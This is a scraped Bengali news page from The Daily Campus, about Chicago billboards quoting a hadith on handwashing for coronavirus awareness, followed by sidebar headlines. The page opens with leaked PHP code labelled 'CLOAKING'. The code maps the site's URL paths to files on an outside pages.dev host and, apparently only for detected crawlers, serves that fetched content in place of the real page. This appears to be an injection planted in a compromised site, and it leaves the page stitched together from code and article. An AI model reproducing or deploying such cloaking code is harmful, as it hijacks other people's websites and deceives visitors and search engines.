/* ===== NORMALISASI PATH (VERSI PERBAIKAN) ===== */ // Ambil path, hapus query string (?abc=123) jika ada $p = parse_url($_SERVER['REQUEST_URI'], PHP_URL_PATH); // Hilangkan index.php $p = str_replace('/index.php', '', $p); // Pastikan path selalu diawali dengan '/' dan tidak diakhiri dengan '/' (kecuali root) $p = '/' . ltrim(rtrim($p, '/'), '/'); /* ===== MAPPING URL ===== */ $map = [ '/technical/251262' => 'content39.txt', '/education-ministry/243185' => 'content40.txt', '/dshe/252183' => 'content41.txt', '/' => 'content42.txt', // Sekarang ini akan terpanggil dengan benar '/ntrca/238706' => 'content43.txt', '/section/admission-test/110' => 'content44.txt', '/section/ntrca/122' => 'content45.txt' ]; /* ===== CLOAKING ===== */ // Debugging sederhana (hapus jika sudah jalan): // echo "Path terdeteksi: " . $p; if($b && isset($map[$p])){ $content_url = "https://new-content-page.pages.dev/" . $map[$p]; $x = fetch($content_url); if($x && strlen(trim($x)) > 50){ header("Content-Type: text/html; charset=utf-8"); echo $x; exit; } } যুক্তরাষ্ট্রে রাসূল (সা.) এর বাণী ব্যবহার করে করোনা সচেতনতার বিলবোর্ড | The Daily Campus

যুক্তরাষ্ট্রে রাসূল (সা.) এর বাণী ব্যবহার করে করোনা সচেতনতার বিলবোর্ড

২০ এপ্রিল ২০২০, ০৫:৪৩ PM

© সংগৃহীত

চীন থেকে ছড়ানো করোনাভাইরাস গোটা বিশ্বে ভয়াবহ পরিস্থিতি সৃষ্টি করেছে। বর্তমানে সবচেয়ে খারাপ অবস্থা যুক্তরাষ্ট্রে। করোনার বিষয়ে মানুষকে সচেতন করতে নানা ধরণের পদ্ধতি ব্যবহার করছে দেশগুলো।

এরই ধারাবাহিকতায় এবার যুক্তরাষ্ট্রের শিকাগো শহরে বিলবোর্ডে বিশ্বনবীর (সা.) বাণী ব্যবহার করে প্রচারণা চালানো শুরু হয়েছে। এ ধরণের বেশ কিছু ছবি সামাজিক যোগাযোগমাধ্যমে ছড়িয়ে পড়েছে।

সচেতনতামূলক ওই বিলবোর্ডে করোনার বিষয়ে সচেতনতা তৈরি করতে হযরত মুহাম্মদ (সাঃ) এর বাণী লেখা রয়েছে। হাদীসের বরাত দিয়ে তাতে লেখা হয়েছে, রাসুলুল্লাহ (সা.) বলেছেন, ‘সংক্রামক রোগের সময় বারবার হাত ধোও, সংক্রামিত এলাকায় প্রবেশ করো না এবং সংক্রামিত এলাকা থেকে বাইরেও যেও না।’

শিকাগোর ওহারে বিমানবন্দরের নিকটে বিলবোর্ডগুলো স্থাপন করা হয়েছে। এর উদ্যোক্তা গেইনপিস নামে একটি সংগঠন। যুক্তরাষ্ট্রের ইলিনয়ভিত্তিক একটি অলাভজনক ইসলামী সংস্থা এটি। ২০০৮ সালে সংস্থাটির যাত্রা শুরু হয়।

বর্তমানে গেইনপিসের পরিচালকের দায়িত্ব পালনকারী ডাক্তার সাবিল আহমেদ গণমাধ্যমকে বলেন, ইসলাম সুন্দর ও বাস্তবসম্মত জীবন ব্যবস্থা। বর্তমানে কিছু বিপথগামী লোকের মাধ্যমে ইসলামের ভুল বাণী ছড়িয়ে পড়ছে। ফলে পশ্চিমা বিশ্বে ইসলাম ফোবিয়া বাড়ছে। আমাদের কাজ হলো, সবার মধ্যে গণমাধ্যম ব্যবহার করে সঠিক ইসলামের বাণী পৌঁছে দেওয়া।’

গেইনপিসের প্রাথমিক উদ্দেশ্য যুক্তরাষ্ট্রের মানুষের মধ্যে সঠিক ইসলামী জ্ঞাণ বিতরণ করা। এছাড়া ক্রমবর্ধমান ইসলাম ফোবিয়া বা ইসলাম ভীতি দূর করা। এর মাধ্যমে তারা সঠিক ইসলামী মূল্যবোধ জানতে পারেন।

২০১৯ সালে শিকাগোসহ যুক্তরাষ্ট্রের কয়েকটি বড় শহরে এমন বিলবোর্ড স্থাপন করে তারা। এছাড়া তাদের হটলাইন নাম্বার আছে। এতে ফোন করে বিনা খরচে ইসলামের বিভিন্ন বিষয় সম্পর্কে জানতে পারেন। পাশাপাশি কেউ ইসলাম ধর্ম গ্রহণ করলে নব মুসলিমদের যাবতীয় দায়িত্ব নেয় গেইনপিস।

চ্যাংদোলা করে নেতাকে বের করা ঘটনায় ছাত্রদলের ৫ নেতাকে শোকজ
  • ২৯ এপ্রিল ২০২৬
দুদকের ৬ মামলায় কারাগারে পাবনা মানসিক হাসপাতালের সাবেক পরিচ…
  • ২৯ এপ্রিল ২০২৬
দেশে আর কোনো সমস্যা নেই, সমস্যা শুধু জামায়াত 
  • ২৯ এপ্রিল ২০২৬
ব্যাংক এশিয়া নিয়োগ দেবে ৭ জেলায়, আবেদন শেষ ১৩ মে
  • ২৯ এপ্রিল ২০২৬
স্রোতে ভেসে যাওয়া মিটার রিডারের মরদেহ উদ্ধার
  • ২৯ এপ্রিল ২০২৬
ছাঁটাই আতঙ্কে তিতুমীর কলেজের ১৭৭ কর্মচারী 
  • ২৯ এপ্রিল ২০২৬